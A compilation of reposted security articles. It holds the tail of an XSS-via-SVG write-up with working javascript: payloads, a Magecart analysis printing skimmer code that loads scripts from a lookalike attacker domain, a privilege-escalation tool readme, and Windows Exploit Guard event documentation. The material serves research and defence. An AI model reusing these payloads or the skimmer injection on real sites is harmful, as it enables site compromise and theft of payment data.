<svg><animate xlink:href=#xss attributeName=href values="	   javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a>

An even quirkier observation is that those values don't need to be HTML-encoded at all (as the payload contains non-printable characters, it was base64-encoded for better readability):

PHN2Zz48YW5pbWF0ZSB4bGluazpocmVmPSN4c3MgYXR0cmlidXRlTmFtZT1ocmVmICB2YWx1ZXM9IgECAwQFBgcICQ0KCwwNCg4PEBESExQVFhcYGRobHB0eHyBqYXZhc2NyaXB0OmFsZXJ0KDEpIiAvPjxhIGlkPXhzcz48dGV4dCB4PTIwIHk9MjA+WFNTPC90ZXh0PjwvYT4=

Summary

In this article we discovered that the SVG specification conceals a lot of potential XSS attack vectors. Even a simple attribute like values may lead to multiple malicious payloads, which helps bypass WAFs. The presented vectors were tested on both Firefox and Chrome.

Paweł Hałdrzyński

Sursa: https://blog.isec.pl/xss-fun-with-animated-svg/
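To see concretely why the value-smuggling trick above defeats naive inspection, here is a toy filter written as a sketch (purely illustrative – this is not the logic of any real WAF): a check that only inspects the start of the whole attribute value misses the payload, while splitting on semicolons, the way the SMIL animation itself consumes the list, exposes it. The regex also allows leading ASCII 1–32 characters before the scheme, matching the observation above.

```javascript
// Toy illustration (not any real WAF engine). The attribute value below is
// taken from the original attack vector in the article.
const attr = "https://safe-url?;javascript:alert(1);0";

// A dangerous entry: "javascript:" optionally preceded by ASCII 0x01-0x20.
const dangerous = /^[\x01-\x20]*javascript:/i;

// Naive filter: checks only whether the whole value starts with the scheme,
// so the smuggled payload slips through as part of a "safe" URL.
const naiveVerdict = dangerous.test(attr);

// SMIL-aware filter: every semicolon-separated entry is a value of its own
// and must be checked individually.
const smilAwareVerdict = attr.split(";").some(v => dangerous.test(v));

console.log(naiveVerdict);     // false -- treated as one safe URL
console.log(smilAwareVerdict); // true  -- the javascript: entry is detected
```

The same splitting logic applies to the keyTimes and fill variants, since in every case the payload is just one entry of the values list.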
-
New Stealth Magecart Attack Bypasses Payment Services Using Iframes
by PerimeterX Research Team
April 14, 2020

Using a PCI compliant payment service? Your buyers' credit card information could still be stolen. PCI compliant payment services hosted within an iframe are not immune from Magecart attacks, and website owners are still responsible for any stolen personally identifiable information (PII) or resulting fines. The PerimeterX research team has uncovered a novel technique for bypassing hosted fields iframe protection, which enables Magecart attackers to skim credit card data while still allowing payment transactions to succeed. This stealthy attack technique gives no indication of compromise to the user or the website admin, enabling the skimming to persist on checkout pages for a long time; users don't suspect any malicious activity since the transaction succeeds as expected. In this blog post we examine an active use of this technique that targets websites using the popular payment provider Braintree, a subsidiary of PayPal.

Our research team has been actively tracking Inter, a popular digital skimming toolkit used to launch Magecart attacks. Inter is widely known for being sold as a complete digital skimming kit and for its ability to easily adapt to many checkout pages on e-commerce sites.

Targeting Braintree Hosted Fields Iframe Protection

The common method for e-commerce businesses to achieve PCI DSS compliance is to outsource the payment process to a third party who is PCI DSS compliant. To achieve this, shops integrate hosted fields – third-party payment scripts within an iframe on the checkout page. The iframe, which is sourced from the payment provider, receives the credit card number, CVV and expiration date in a protected scope, in which the browser enforces a data access restriction as part of its Same Origin Policy (SOP) security mechanism. This is often thought to protect payment forms from Magecart and digital skimming attacks.
In order to get around this, Magecart attackers have been using toolkits such as Inter to modify checkout pages and replace the hosted fields with fake checkout forms that they control, from which they can skim credit card numbers. Although similar in look and feel to the real checkout forms, the fake ones do not allow a successful transaction, which can alert the paying customer and the site admin that something is wrong, leading them to restore a clean version of the site and remove the infection. This limits the length of time the attack can go unnoticed. This technique has been used for a while but, according to our contact and recent reports of such attacks, it has not been very successful: users and admins can quickly detect the failed first attempt and the subtle GUI differences and then reload a clean version of the site.

The Magecart group we are tracking has been focusing its efforts on breaking iframe protection on websites using popular payment services including Braintree, Worldpay and Stripe. And they have been successful in one instance with a website using Braintree.

Bypassing Braintree Iframe Protection

Our research led us to a digital skimming toolkit called Saturn, a package consisting of the skimmer and the command and control service. This toolkit was used to compromise the Braintree hosted fields payment form on a European e-commerce website.
Figure: Admin console for the Saturn toolkit

Braintree enables an online seller to achieve PCI DSS compliance under the SAQ A criteria, for "card-not-present merchants that have fully outsourced all cardholder data functions to PCI DSS validated third-party service providers, with no electronic storage, processing, or transmission of any cardholder data on the merchant's systems or premises." In order to achieve this, Braintree payment forms and scripts are loaded within an iframe on the payment page, so that the seller does not have any access to read, store or process the credit card information. The transaction payment information is tokenized between the shop and Braintree, while a nonce is set to allow future transactions. Here is an explanation from Braintree's Get Started guide.

Figure: Braintree payment processing flow

Figure: Braintree payment processing steps

The attacker modified the Braintree scripts on the e-commerce website and created the following multi-step attack, resulting in the injection of a skimmer script into the hosted iframe while still allowing the transaction to succeed.

Step 1: Compromising the Braintree scripts

After getting a foothold in the website, the attack starts by changing the Magento Braintree payment script to load the client script from the attacker's domain. This seemingly supported change might have been possible due to an option in the Magento plugin allowing a first-party load of the script, or for CDN purposes. The script will now load the modified JavaScript from braintreegateway24[.]com, a domain controlled by the attacker, instead of braintreegateway[.]com, the legitimate protected domain.
(function() {
  var config = {map: {'*': {braintree: 'https://braintreegateway24[.]com/js/braintree-2.32.min.js'}}};
  require.config(config);
})()

Step 2: Bypassing client-side validation

The original Braintree client script validates the origin it was loaded from, but the attack bypasses this by adding the attacker's domains to the regex and whitelist in the modified client script.

function(t, e, n) {
  "use strict";
  function i(t, e) {
    var n, i, r = document.createElement("a");
    return r.href = e,
      i = "https:" === r.protocol ? r.host.replace(/:443$/, "") : "http:" === r.protocol ? r.host.replace(/:80$/, "") : r.host,
      n = r.protocol + "//" + i,
      n === t || o.test(t)
  }
  var o = /^https:\/\/([a-zA-Z0-9-]+\.)*(braintreepayments|braintreegateway|paypal|braintreegateway24)\.[a-z]+(:\d{1,5})?$/;
  e.exports = { checkOrigin: i }
}

var u = t(15),
  l = document.createElement("a"),
  h = [
    "paypal.com",
    "braintreepayments.com",
    "braintreegateway.com",
    "braintreegateway24.tech",
    "braintreegateway24.com",
    "localhost",
  ];
e.exports = {
  isBrowserHttps: i,
  makeQueryString: r,
  decodeQueryString: s,
  getParams: a,
  isWhitelistedDomain: c,
};

To allow running a skimmer inside the hosted iframe, the script replaces the hosted field iframe's address with the address of another attacker-controlled domain.
(r = c({
  type: p,
  name: "braintree-hosted-field-" + p,
  style: h.defaultIFrameStyle,
})),
this.injectedNodes.push(i(r, n)),
this.setupLabelFocus(p, n),
(m[p] = {
  frameElement: r,
  containerElement: n,
}),
g++,
setTimeout(
  (function(e) {
    return function() {
      var loa = l(t.gatewayConfiguration.assetsUrl, t.channel);
      loa = loa.replace(
        "assets.braintreegateway.com/hosted-fields/2.25.0",
        "braintreegateway24.tech/hosted-fields/2.25"
      );
      e.src = loa;
    };
  })(r),
  0
);

Step 3: Injecting the skimmer script

The attacker-controlled client script injects a file named "helper.js", which runs in the context of the checkout page and steals the user's name, address, phone number, etc. – but not the payment details, which are only accessible from within the hosted iframes.

var s2 = document.createElement("script");
s2.setAttribute("src", "https://braintreegateway24.com/js/helper.js");
document
  .getElementsByTagName("head")
  .item(0)
  .appendChild(s2);

Step 4: Injecting the hosted iframe with the skimmer script

Due to the change in step 2, the browser now loads the iframe from a domain the attacker controls. The attacker-controlled iframe loads the Braintree credit card collector along with an additional skimmer script in the same iframe context, which allows it to access the private details. This effectively bypasses the SOP protection the payment iframe was meant to provide.

Figure: Compromised Braintree skimmer script loaded on the web page

These 4 steps allow the attacker to steal all the payment details needed for online transactions, while still continuing the checkout flow and allowing the real transaction to be accepted on the first attempt. PayPal approves the transaction, as it is not fraudulent, even though the payment details were stolen in the process. The website admin and consumer are not alerted in any way, allowing the operation to stay undetected.
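The weakness exploited in Step 2 is easy to reproduce in isolation. In the sketch below, the first regex is a reconstruction of what the legitimate origin whitelist presumably looked like (the article only shows the tampered version), and the second is the attacker-modified regex quoted above – the only change needed is one extra alternation branch:

```javascript
// Presumed original Braintree origin-check regex (reconstructed -- the
// article only shows the attacker's modified version).
const originalWhitelist = /^https:\/\/([a-zA-Z0-9-]+\.)*(braintreepayments|braintreegateway|paypal)\.[a-z]+(:\d{1,5})?$/;

// Attacker-modified regex from the compromised client script: the lookalike
// domain "braintreegateway24" is simply appended to the alternation.
const modifiedWhitelist = /^https:\/\/([a-zA-Z0-9-]+\.)*(braintreepayments|braintreegateway|paypal|braintreegateway24)\.[a-z]+(:\d{1,5})?$/;

const attackerOrigin = "https://braintreegateway24.com";

console.log(originalWhitelist.test(attackerOrigin)); // false -- rejected
console.log(modifiedWhitelist.test(attackerOrigin)); // true  -- now "trusted"
console.log(modifiedWhitelist.test("https://braintreegateway.com")); // true -- legit origin still passes
```

Because the legitimate origins still pass, the payment flow works exactly as before, which is what keeps the compromise invisible to users and admins.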
Figure: Order success page on an infected website indicating that the payment transaction was successful

PayPal's Response

We disclosed this issue to Braintree and PayPal, as well as to the infected website identified in this attack. PayPal's team was quick to review the case and provide a response. PayPal's position is that this attack requires an XSS context already in place and that they cannot be responsible for the web application security of their customers' websites. Their payment gateway still accepts transactions from the modified version of the script, which steals credit card numbers at the same time. Iframes do not protect the website in this scenario; preventing digital skimming and Magecart attacks is ultimately the responsibility of the website owner. We were unable to get a response from the infected site's owners despite repeated requests to the website administrators and even their sales team.

Iframe Protection Cannot Stop Magecart Attacks

While iframe protection helps the site comply with PCI DSS standards, compliance does not equal security. In this case the website doesn't hold the credit card information, and PayPal only approves legitimate transactions initiated by legitimate users – yet the credit card numbers and CVV were stolen. The PCI Security Standards Council (PCI SSC) and the Retail and Hospitality ISAC issued a joint bulletin in August 2019 highlighting that digital skimming and Magecart attacks require urgent attention.

"There are ways to prevent these difficult-to-detect attacks however. A defense-in-depth approach with ongoing commitment to security, especially by third-party partners, will help guard against becoming a victim of this [Magecart] threat." - Troy Leach, Chief Technology Officer (CTO) of the PCI Security Standards Council.

Ultimately, e-commerce businesses are responsible for ensuring a safe and secure user experience for their customers.
If credit card numbers are stolen from their website, it hurts their brand reputation and exposes them to liability and regulatory fines. As we have seen in this attack, iframes are not a foolproof solution for protection against the Magecart threat. Businesses must use client-side visibility solutions to detect such attacks and mitigate them quickly. For more updates on emerging Magecart attacks, subscribe to the PerimeterX blog.

Indicators of Compromise

Compromised website: https://ricambipoltroneelettriche[.]salesource[.]it/checkout#payment

Modified version of Braintree – malicious client-side JavaScript: https://braintreegateway24[.]com/js/braintree-2.32.min.js

Malicious iframes: https://braintreegateway24[.]tech/hosted-fields/2.25/hosted-fields-frame.html

Sursa: https://www.perimeterx.com/resources/blog/2020/new-stealth-magecart-attack-bypasses-payment-services-using-iframes/
-
PEASS - Privilege Escalation Awesome Scripts SUITE

Here you will find privilege escalation tools for Windows and Linux/Unix* (and in the near future also for Mac). These tools search for possible local privilege escalation paths that you could exploit and print them with nice colors so you can recognize the misconfigurations easily.

Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz
WinPEAS - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)

Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz
LinPEAS - Linux local Privilege Escalation Awesome Script (.sh)

Let's improve PEASS together

If you want to add something or have any cool idea related to this project, please let me know in the Telegram group https://t.me/peass or via GitHub issues, and we will update the master version.

Please, if this tool has been useful to you, consider donating.

Looking for a useful Privilege Escalation Course? Contact me and ask about the Privilege Escalation Course I am preparing for attackers and defenders (100% technical).

Advisory

All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own networks and/or with the network owner's permission.

License

MIT License

By Polop(TM)

Sursa: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
-
Exploit Protection Event Documentation

Last updated: 10/15/19
Research by: Matthew Graeber @ SpecterOps
Associated Blog Post: https://medium.com/palantir/assessing-the-effectiveness-of-a-new-security-data-source-windows-defender-exploit-guard-860b69db2ad2

One of the most valuable features of WDEG is the set of Windows event logs generated when a security feature is triggered. While documentation on configuration (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/customize-exploit-protection) and deployment (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/import-export-exploit-protection-emet-xml) of WDEG is readily accessible, documentation on what events WDEG supports, and the context around them, does not exist. The Palantir CIRT is of the opinion that the value of an event source is realized only upon documenting each field, applying context around the event, and leveraging these as discrete detection capabilities. WDEG supplies events from multiple event sources (ETW providers) and destinations (event logs). In the documentation that follows, events are organized by their respective event destination. Additionally, many events use the same event template and are grouped accordingly. Microsoft does not currently document these events; context was acquired by utilizing documented ETW methodology (https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63), reverse engineering, and support from security researchers (James Forshaw (https://twitter.com/tiraniddo) and Alex Ionescu (https://twitter.com/aionescu)) generously answering questions on Windows internals.

Event Log: Microsoft-Windows-Security-Mitigations/KernelMode

Events Consisting of Process Context

Event ID 1 - Arbitrary Code Guard (ACG) Auditing
Message: "Process '%2' (PID %5) would have been blocked from generating dynamic code."
Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitDynamicCode Description: ACG (https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/) prevents/logs attempted permission modification of code pages (making a page writeable, specifically) and prevents unsigned code pages from being created. Event ID 2 - Arbitrary Code Guard (ACG) Enforcement Message: "Process '%2' (PID %5) was blocked from generating dynamic code." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitDynamicCode Event ID 7 - Audit: Log Remote Image Loads Message: "Process '%2' (PID %5) would have been blocking from loading a binary from a remote share." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitRemoteImageMap Description: Prevents/logs the loading of images from remote UNC/WebDAV shares, a common exploitation/dll hijack primitive used (https://www.rapid7.com/db/modules/exploit/windows/browser/ms10_046_shortcut_icon_dllloader) to load subsequent attacker code from an attacker-controlled location. Event ID 8 - Enforce: Block Remote Image Loads Message: "Process '%2' (PID %5) was blocked from loading a binary from a remote share." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitRemoteImageMap Event ID 9 - Audit: Log Win32K System Call Table Use Message: "Process '%2' (PID %5) would have been blocked from making system calls to Win32k.sys." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitWin32kSystemCalls Description: A user-mode GUI thread attempted to access the Win32K syscall table. Win32K syscalls are used frequently to trigger elevation of privilege (https://www.slideshare.net/PeterHlavaty/rainbow-over-the-windows-more-colors-than-you-could-expect) and sandbox escape vulnerabilities (https://improsec.com/tech-blog/win32k-system-call-filtering-deep-dive). 
For processes that do not intend to perform GUI-related tasks, Win32K syscall auditing/enforcement can be valuable. Event ID 10 - Enforce: Prevent Win32K System Call Table Use Message: "Process '%2' (PID %5) was blocked from making system calls to Win32k.sys." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitWin32kSystemCalls Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. CallingProcessId The process ID of the process that triggered the event. CallingProcessCreateTime The creation time of the process that triggered the event. CallingProcessStartKey This field represents a locally unique identifier for the process. It was designed as a more robust version of process ID that is resistant to being repeated. Process start key was introduced in Windows 10 1507 and is derived from _KUSER_SHARED_DATA.BootId and EPROCESS.SequenceNumber, both of which increment and are unlikely to overflow. It is an unsigned 64-bit value that is derived using the following logic: (BootId << 30) | SequenceNumber. Kernel drivers can retrieve the process start key for a process by calling the PsGetProcessStartKey export in ntoskrnl.exe. A process start key can also be derived from user-mode (https://gist.github.com/mattifestation/3c2e8f80ca1fe1a7e276ee2607da8d18). CallingProcessSignatureLevel The signature level of the process executable. This is the validated signing level for the process when it was started. This field is populated from EPROCESS.SignatureLevel.
Signature level can be any of the following values: 0x0 - Unchecked 0x1 - Unsigned 0x2 - Enterprise 0x3 - Custom1 0x4 - Authenticode 0x5 - Custom2 0x6 - Store 0x7 - Antimalware 0x8 - Microsoft 0x9 - Custom4 0xA - Custom5 0xB - DynamicCodegen 0xC - Windows 0xD - WindowsProtectedProcessLight 0xE - WindowsTcb 0xF - Custom6 CallingProcessSectionSignatureLevel The section signature level is the default required signature level for any modules that get loaded into the process. The same values as ProcessSignatureLevel are supported. This field is populated from EPROCESS.SectionSignatureLevel. The following are some example process and process section signature levels that you might realistically encounter: ProcessSignatureLevel: 8, ProcessSectionSignatureLevel: 6. This indicates that a Microsoft-signed host process will only load images with a Store signature at a minimum. Thanks to Alex Ionescu for pointing out this example scenario. ProcessSignatureLevel: 2, ProcessSectionSignatureLevel: 2. This indicates that both process and module loading are dictated by Windows Defender Application Control (WDAC) policy. ProcessSignatureLevel: 0, ProcessSectionSignatureLevel: 0. This would indicate that signature level enforcement for process and module loading is not enforced. CallingProcessProtection The type of protected process and the protected process signer. This field is populated from EPROCESS.Protection and corresponds to the PS_PROTECTION structure. These values are well documented in Windows Internals: Volume 7. 
The first 3 bits contain the type of protected process (refers to the low nibble of the value): PsProtectedTypeNone - 0 PsProtectedTypeProtectedLight - 1 PsProtectedTypeProtected - 2 The top 4 bits contain the protected process signer (refers to the high nibble of the value): PsProtectedSignerNone - 0 PsProtectedSignerAuthenticode - 1 PsProtectedSignerCodeGen - 2 PsProtectedSignerAntimalware - 3 PsProtectedSignerLsa - 4 PsProtectedSignerWindows - 5 PsProtectedSignerWinTcb - 6 PsProtectedSignerWinSystem - 7 PsProtectedSignerApp - 8 Here are some example process protection values: 0x31 - A PPL, antimalware process 0x62 - A protected, WinTCB process CallingThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. CallingThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. Child Process Creation Events Event ID 3 - Audit: Child Process Creation Message: “Process '%2' (PID %5) would have been blocked from creating a child process '%14' with command line '%16'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitChildProcessCreation Description: log/prevents child process creation Event ID 4 - Enforce: Prevent Child Process Creation Message: “Process '%2' (PID %5) was blocked from creating a child process '%14' with command line '%16'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitChildProcessCreation Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. 
CallingProcessId The process ID of the process that triggered the event. CallingProcessCreateTime The creation time of the process that triggered the event. CallingProcessStartKey See section above. CallingProcessSignatureLevel See section above. CallingProcessSectionSignatureLevel See section above. CallingProcessProtection See section above. CallingThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. CallingThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. ChildImagePathNameLength The length, in characters, of the string in the ChildImagePathName field. ChildImagePathName The path to the image that is attempting to load. ChildCommandLineLength The length, in characters, of the string in the ChildCommandLine field. ChildCommandLine The command line of the image that is attempting to load. Low Integrity Image Load Events Event ID 5 - Audit: low integrity image load Message: “Process '%2' (PID %5) would have been blocked from loading the low-integrity binary '%14'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitLowILImageMap Event ID 6 - Enforce: block low integrity image load Message: “Process '%2' (PID %5) was blocked from loading the low-integrity binary '%14'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitLowILImageMap Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary that triggered the event. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process that triggered the event. ProcessId The process ID of the process that triggered the event. 
ProcessCreateTime The creation time of the process that triggered the event. ProcessStartKey See section above. ProcessSignatureLevel See section above. ProcessSectionSignatureLevel See section above. ProcessProtection See section above. TargetThreadId The thread ID of the thread responsible for triggering the event. This field is populated from ETHREAD.Cid.UniqueThread. TargetThreadCreateTime The creation time of the thread responsible for triggering the event. This field is populated from ETHREAD.CreateTime. ImageNameLength The length, in characters, of the string in the ImageName field. ImageName The name of the image that attempted to load with low integrity. Non-Microsoft Binary Load Events Event ID 11 - Audit: A non-Microsoft-signed binary would have been loaded. Message: “Process '%2' (PID %5) would have been blocked from loading the non-Microsoft-signed binary '%16'." Level: 0 (Log Always) Function that generates the event: ntoskrnl!EtwTimLogProhibitNonMicrosoftBinaries Description: This event is logged any time a PE is loaded into a process that is not Microsoft-signed. Event ID 12 - Enforce: A non-Microsoft-signed binary was prevented from loading. Message: “Process '%2' (PID %5) was blocked from loading the non-Microsoft-signed binary '%16'." Level: 3 (Warning) Function that generates the event: ntoskrnl!EtwTimLogProhibitNonMicrosoftBinaries Event Properties ProcessPathLength The length, in characters, of the string in the ProcessPath field. ProcessPath The full path (represented as a device path) of the host process binary into which a non-MSFT binary attempted to load. ProcessCommandLineLength The length, in characters, of the string in the ProcessCommandLine field. ProcessCommandLine The full command line of the process into which a non-MSFT binary attempted to load. ProcessId The process ID of the process into which a non-MSFT binary attempted to load. ProcessCreateTime The creation time of the process into which a non-MSFT binary attempted to load. 
ProcessStartKey See section above. ProcessSignatureLevel See section above. ProcessSectionSignatureLevel See section above. ProcessProtection See section above. TargetThreadId The thread ID of the thread responsible for attempting to load the non-MSFT binary. This field is populated from ETHREAD.Cid.UniqueThread. TargetThreadCreateTime The creation time of the thread responsible for attempting to load the non-MSFT binary. This field is populated from ETHREAD.CreateTime. RequiredSignatureLevel The minimum signature level being imposed by WDEG. The same values as ProcessSignatureLevel are supported. This value will either be 8 in the case of Microsoft-signed binaries only or 6 in the case where Store images are permitted. SignatureLevel The validated signature level of the image present in the ImageName field. The same values as ProcessSignatureLevel are supported. A value less than RequiredSignatureLevel indicates the reason why EID 11/12 was logged in the first place. When this event is logged, SignatureLevel will always be less than RequiredSignatureLevel. ImageNameLength The length, in characters, of the string in the ImageName field. ImageName The full path to the image that attempted to load into the host process. Event Log: Microsoft-Windows-Security-Mitigations/UserMode Export/Import Address Table Access Filtering (EAF/IAF) Events Event ID 13 - EAF mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Export Address Table for module '%8'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Description: The export address table was accessed by code that is not backed by an image on disk - i.e. injected shellcode is the likely culprit for accessing the EAT. Event ID 14 - EAF mitigation enforced Message: “Process '%2' (PID %3) was blocked from accessing the Export Address Table for module '%8'."
Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Event ID 15 - EAF+ mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Export Address Table for module '%8'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Description: The export address table was accessed by code that is not backed by an image on disk and via many other improved heuristics - i.e. injected shellcode is the likely culprit for accessing the EAT. Event ID 16 - EAF+ mitigation enforced Message: “Process '%2' (PID %3) was blocked from accessing the Export Address Table for module '%8'." Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibValidateAccessToProtectedPage Event ID 17 - IAF mitigation audited Message: “Process '%2' (PID %3) would have been blocked from accessing the Import Address Table for API '%10'." Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibProcessIAFGuardPage Description: The import address table was accessed by code that is not backed by an image on disk. Event ID 18 - IAF mitigation enforced Message: “Process '%2' (PID %3) was blocked from accessing the Import Address Table for API '%10'." Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibProcessIAFGuardPage Event Properties Subcode Specifies a value in the range of 1-4 that indicates how the event was triggered. 1 - Indicates that the classic EAF mitigation was triggered. This subcode is used if the instruction pointer address used to access the EAF does not map to a DLL that was loaded from disk (ntdll!RtlPcToFileHeader (https://docs.microsoft.com/en-us/windows/desktop/api/winnt/nf-winnt-rtlpctofileheader) is used to make this determination). 2 - Indicates that the stack registers ([R|E]SP and [R|E]BP) fall outside the stack extent of the current thread.
This is one of the EAF+ mitigations. 3 - Indicates that a memory reader gadget was used to access the EAF. PayloadRestrictions.dll statically links a disassembler library that attempts to make this determination. This is one of the EAF+ mitigations. 4 - Indicates that the IAF mitigation triggered. This also implies that the APIName property will be populated. ProcessPath The full path of the process in which the EAF/IAF mitigation triggered. ProcessId The process ID of the process in which the EAF/IAF mitigation triggered. ModuleFullPath The full path of the module that caused the mitigation to trigger. This value will be empty if the subcode value is 1. ModuleBase The base address of the module that caused the mitigation to trigger. This value will be 0 if the subcode value is 1. ModuleAddress The instruction pointer address ([R|E]IP) upon the mitigation triggering. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemAddress The virtual address that was accessed within a protected module that triggered a guard page exception. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemModuleFullPath The full path of the protected module that was accessed. This string is obtained from LDR_DATA_TABLE_ENTRY.FullDllName in the PEB. This property is only relevant to the EAF mitigations. It does not apply to the IAF mitigation. MemModuleBase The base address of the protected module that was accessed. APIName The blacklisted export function name that was accessed. This property is only applicable to the IAF mitigation. The following APIs are included in the blacklist: GetProcAddressForCaller, LdrGetProcedureAddress, LdrGetProcedureAddressEx, CreateProcessAsUserA, CreateProcessAsUserW, GetModuleHandleA, GetModuleHandleW, RtlDecodePointer, DecodePointer. ProcessStartTime The creation time of the process specified in ProcessPath/ProcessId. 
The process time is obtained by calling NtQueryInformationProcess (https://docs.microsoft.com/en-us/windows/desktop/api/winternl/nf-winternl-ntqueryinformationprocess) with ProcessTimes as the ProcessInformationClass argument. The process time is obtained from the CreateTime field of the KERNEL_USER_TIMES structure. ThreadId The thread ID of the thread that generated the event. Return-Oriented Programming (ROP) Events Event ID 19 - ROP mitigation audited: Stack Pivot Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibNotifyStackPivotViolation Description: A ROP stack pivot was detected by observing that the stack pointer fell outside the stack extent (stack base and stack limit) for the current thread. Event ID 20 - ROP mitigation enforced: Stack Pivot Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibNotifyStackPivotViolation Event ID 21 - ROP mitigation audited: Caller Checks Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibRopCheckCaller Description: This event is logged if one of the functions listed in the HookedAPI section below was not called with a call instruction - e.g. called via a RET instruction. Event ID 22 - ROP mitigation enforced: Caller Checks Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications.
Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibRopCheckCaller Event ID 23 - ROP mitigation audited: Simulate Execution Flow Message: Process '%2' (PID %3) would have been blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 0 (Log Always) Function that generates the event: PayloadRestrictions!MitLibRopCheckSimExecFlow Description: The simulate execution flow mitigation simulates continued execution of any of the functions listed in the HookedAPI section and, if any of the return logic along the stack resembles ROP behavior, this event is triggered. Event ID 24 - ROP mitigation enforced: Simulate Execution Flow Message: Process '%2' (PID %3) was blocked from calling the API '%4' due to return-oriented programming (ROP) exploit indications. Level: 3 (Warning) Function that generates the event: PayloadRestrictions!MitLibRopCheckSimExecFlow Event Properties Subcode Specifies a value in the range of 5-7 that indicates how the event was triggered. 5 - Indicates that the stack pivot ROP mitigation was triggered. 6 - Indicates that the “caller checks" ROP mitigation was triggered. 7 - Indicates that the “simulate execution flow" ROP mitigation was triggered. ProcessPath The full path of the process in which the ROP mitigation triggered. ProcessId The process ID of the process in which the ROP mitigation triggered. HookedAPI The name of the monitored API that triggered the event.
The following hooked APIs are monitored: LoadLibraryA, LoadLibraryW, LoadLibraryExA, LoadLibraryExW, LdrLoadDll, VirtualAlloc, VirtualAllocEx, NtAllocateVirtualMemory, VirtualProtect, VirtualProtectEx, NtProtectVirtualMemory, HeapCreate, RtlCreateHeap, CreateProcessA, CreateProcessW, CreateProcessInternalA, CreateProcessInternalW, NtCreateUserProcess, NtCreateProcess, NtCreateProcessEx, CreateRemoteThread, CreateRemoteThreadEx, NtCreateThreadEx, WriteProcessMemory, NtWriteVirtualMemory, WinExec, LdrGetProcedureAddressForCaller, GetProcAddress, GetProcAddressForCaller, LdrGetProcedureAddress, LdrGetProcedureAddressEx, CreateProcessAsUserA, CreateProcessAsUserW, GetModuleHandleA, GetModuleHandleW, RtlDecodePointer, DecodePointer ReturnAddress I was unable to spend much time reversing PayloadRestrictions.dll to determine how this property is populated, but based on fired events and inference, this property indicates the return address for the current stack frame that triggered the ROP event. A return address that pointed to an address in the stack or to an address of another ROP gadget (a small sequence of instructions followed by a return instruction) would be considered suspicious. CalledAddress This appears to be the address of the hooked, blacklisted API that was called by the potential ROP chain. TargetAddress This value appears to be the target call/jump address of the ROP gadget to which control was to be transferred via non-traditional means. The TargetAddress value is zero when the “simulate execution flow" ROP mitigation was triggered. StackAddress The stack address triggering the stack pivot ROP mitigation. This value is only populated by the stack pivot ROP mitigation. The StackAddress value is zero when the “simulate execution flow" and “caller checks" ROP mitigations are triggered. When StackAddress is populated, it would indicate that the stack address falls outside the stack extent (NT_TIB StackBase/StackLimit range) for the current thread.
